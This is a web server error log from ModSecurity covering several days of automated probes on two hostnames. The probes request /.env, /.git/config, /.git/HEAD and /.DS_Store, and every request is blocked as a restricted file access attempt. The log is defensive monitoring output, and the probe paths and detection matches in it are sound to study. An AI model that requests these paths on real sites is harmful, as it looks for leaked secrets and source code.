[Thu Sep 18 13:47:31.658849 2025] [:error] [pid 2817645] [client 45.148.10.246:34566] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMvxU_cKhnzc8_MgaByIrwAAAAE"]
[Thu Sep 18 13:47:31.659012 2025] [:error] [pid 2817645] [client 45.148.10.246:34566] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMvxU_cKhnzc8_MgaByIrwAAAAE"]
[Fri Sep 19 05:01:25.137310 2025] [:error] [pid 2841274] [client 185.161.209.196:49144] [client 185.161.209.196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aMzHhX6-Qx0in_28Dw4mnwAAAAI"]
[Fri Sep 19 05:01:25.137592 2025] [:error] [pid 2841274] [client 185.161.209.196:49144] [client 185.161.209.196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aMzHhX6-Qx0in_28Dw4mnwAAAAI"]
[Fri Sep 19 05:01:25.137773 2025] [:error] [pid 2841274] [client 185.161.209.196:49144] [client 185.161.209.196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aMzHhX6-Qx0in_28Dw4mnwAAAAI"]
[Fri Sep 19 12:13:22.726326 2025] [:error] [pid 2852277] [client 68.183.231.190:40808] [client 68.183.231.190] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM0swrTPWd-ygSM77xHlFwAAABE"]
[Fri Sep 19 12:13:22.726649 2025] [:error] [pid 2852277] [client 68.183.231.190:40808] [client 68.183.231.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM0swrTPWd-ygSM77xHlFwAAABE"]
[Fri Sep 19 12:13:22.726820 2025] [:error] [pid 2852277] [client 68.183.231.190:40808] [client 68.183.231.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM0swrTPWd-ygSM77xHlFwAAABE"]
[Sat Sep 20 11:24:23.221171 2025] [authz_core:error] [pid 2871947] [client 206.81.24.227:56632] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Sep 20 11:24:23.650163 2025] [:error] [pid 2875680] [client 206.81.24.227:56648] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aM5yx6oVi5ddQ3iV0hrSoQAAAA4"]
[Sat Sep 20 11:24:23.650419 2025] [:error] [pid 2875680] [client 206.81.24.227:56648] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aM5yx6oVi5ddQ3iV0hrSoQAAAA4"]
[Sat Sep 20 11:24:23.650596 2025] [:error] [pid 2875680] [client 206.81.24.227:56648] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aM5yx6oVi5ddQ3iV0hrSoQAAAA4"]
[Sat Sep 20 11:24:23.772982 2025] [:error] [pid 2875676] [client 206.81.24.227:56652] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM5yx1I6g7UOwi4TEyYWXwAAAAY"]
[Sat Sep 20 11:24:23.773227 2025] [:error] [pid 2875676] [client 206.81.24.227:56652] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM5yx1I6g7UOwi4TEyYWXwAAAAY"]
[Sat Sep 20 11:24:23.773392 2025] [:error] [pid 2875676] [client 206.81.24.227:56652] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM5yx1I6g7UOwi4TEyYWXwAAAAY"]
[Sat Sep 20 11:24:23.913673 2025] [:error] [pid 2875704] [client 206.81.24.227:56658] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM5yx9uBcZy2InunqY8YBAAAAAE"]
[Sat Sep 20 11:24:23.913898 2025] [:error] [pid 2875704] [client 206.81.24.227:56658] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM5yx9uBcZy2InunqY8YBAAAAAE"]
[Sat Sep 20 11:24:23.914058 2025] [:error] [pid 2875704] [client 206.81.24.227:56658] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM5yx9uBcZy2InunqY8YBAAAAAE"]
[Sat Sep 20 17:42:12.686201 2025] [:error] [pid 2875739] [client 196.251.70.47:46830] [client 196.251.70.47] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aM7LVN2xrmMPc4S5EBO0RgAAAA8"]
[Sat Sep 20 17:42:12.686526 2025] [:error] [pid 2875739] [client 196.251.70.47:46830] [client 196.251.70.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aM7LVN2xrmMPc4S5EBO0RgAAAA8"]
[Sat Sep 20 17:42:12.686701 2025] [:error] [pid 2875739] [client 196.251.70.47:46830] [client 196.251.70.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aM7LVN2xrmMPc4S5EBO0RgAAAA8"]
[Sat Sep 20 22:48:17.318279 2025] [:error] [pid 2875737] [client 103.109.103.44:49562] [client 103.109.103.44] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM8TEZAF-ji_h14TzyoIZAAAAAc"]
[Sat Sep 20 22:48:17.318592 2025] [:error] [pid 2875737] [client 103.109.103.44:49562] [client 103.109.103.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM8TEZAF-ji_h14TzyoIZAAAAAc"]
[Sat Sep 20 22:48:17.318759 2025] [:error] [pid 2875737] [client 103.109.103.44:49562] [client 103.109.103.44] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM8TEZAF-ji_h14TzyoIZAAAAAc"]
[Sat Sep 20 23:50:36.518258 2025] [:error] [pid 2878058] [client 93.123.109.247:48372] [client 93.123.109.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aM8hrIlwm5SGQpsWF2ZPbgAAAAQ"]
[Sat Sep 20 23:50:36.518661 2025] [:error] [pid 2878058] [client 93.123.109.247:48372] [client 93.123.109.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aM8hrIlwm5SGQpsWF2ZPbgAAAAQ"]
[Sat Sep 20 23:50:36.518836 2025] [:error] [pid 2878058] [client 93.123.109.247:48372] [client 93.123.109.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aM8hrIlwm5SGQpsWF2ZPbgAAAAQ"]
[Sun Sep 21 08:49:27.683741 2025] [:error] [pid 2896912] [client 45.148.10.246:53672] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM-f92YHOUDEoU5h4fwPvQAAAAc"]
[Sun Sep 21 08:49:27.683974 2025] [:error] [pid 2896912] [client 45.148.10.246:53672] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM-f92YHOUDEoU5h4fwPvQAAAAc"]
[Sun Sep 21 08:49:27.684133 2025] [:error] [pid 2896912] [client 45.148.10.246:53672] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM-f92YHOUDEoU5h4fwPvQAAAAc"]
[Sun Sep 21 08:49:30.530898 2025] [:error] [pid 2892810] [client 45.148.10.246:53684] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM-f-oie5XI1N4gPYQf3cgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Sun Sep 21 08:49:30.531131 2025] [:error] [pid 2892810] [client 45.148.10.246:53684] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM-f-oie5XI1N4gPYQf3cgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Sun Sep 21 08:49:30.531288 2025] [:error] [pid 2892810] [client 45.148.10.246:53684] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM-f-oie5XI1N4gPYQf3cgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Sun Sep 21 10:02:34.945851 2025] [:error] [pid 2896912] [client 103.109.103.44:31220] [client 103.109.103.44] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM-xGmYHOUDEoU5h4fwPxAAAAAc"]
[Sun Sep 21 10:02:34.946110 2025] [:error] [pid 2896912] [client 103.109.103.44:31220] [client 103.109.103.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM-xGmYHOUDEoU5h4fwPxAAAAAc"]
[Sun Sep 21 10:02:34.946259 2025] [:error] [pid 2896912] [client 103.109.103.44:31220] [client 103.109.103.44] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aM-xGmYHOUDEoU5h4fwPxAAAAAc"]
[Sun Sep 21 19:18:34.083883 2025] [:error] [pid 2907327] [client 45.130.203.137:35471] [client 45.130.203.137] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aNAzamjgHuWRBteu4kYBjgAAABE"]
[Sun Sep 21 19:18:34.084126 2025] [:error] [pid 2907327] [client 45.130.203.137:35471] [client 45.130.203.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aNAzamjgHuWRBteu4kYBjgAAABE"]
[Sun Sep 21 19:18:34.084286 2025] [:error] [pid 2907327] [client 45.130.203.137:35471] [client 45.130.203.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aNAzamjgHuWRBteu4kYBjgAAABE"]
[Sun Sep 21 19:36:20.726599 2025] [:error] [pid 2907325] [client 196.251.70.47:32956] [client 196.251.70.47] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNA3lFrGS2vP_CNd6NeWlwAAAA8"]
[Sun Sep 21 19:36:20.726897 2025] [:error] [pid 2907325] [client 196.251.70.47:32956] [client 196.251.70.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNA3lFrGS2vP_CNd6NeWlwAAAA8"]
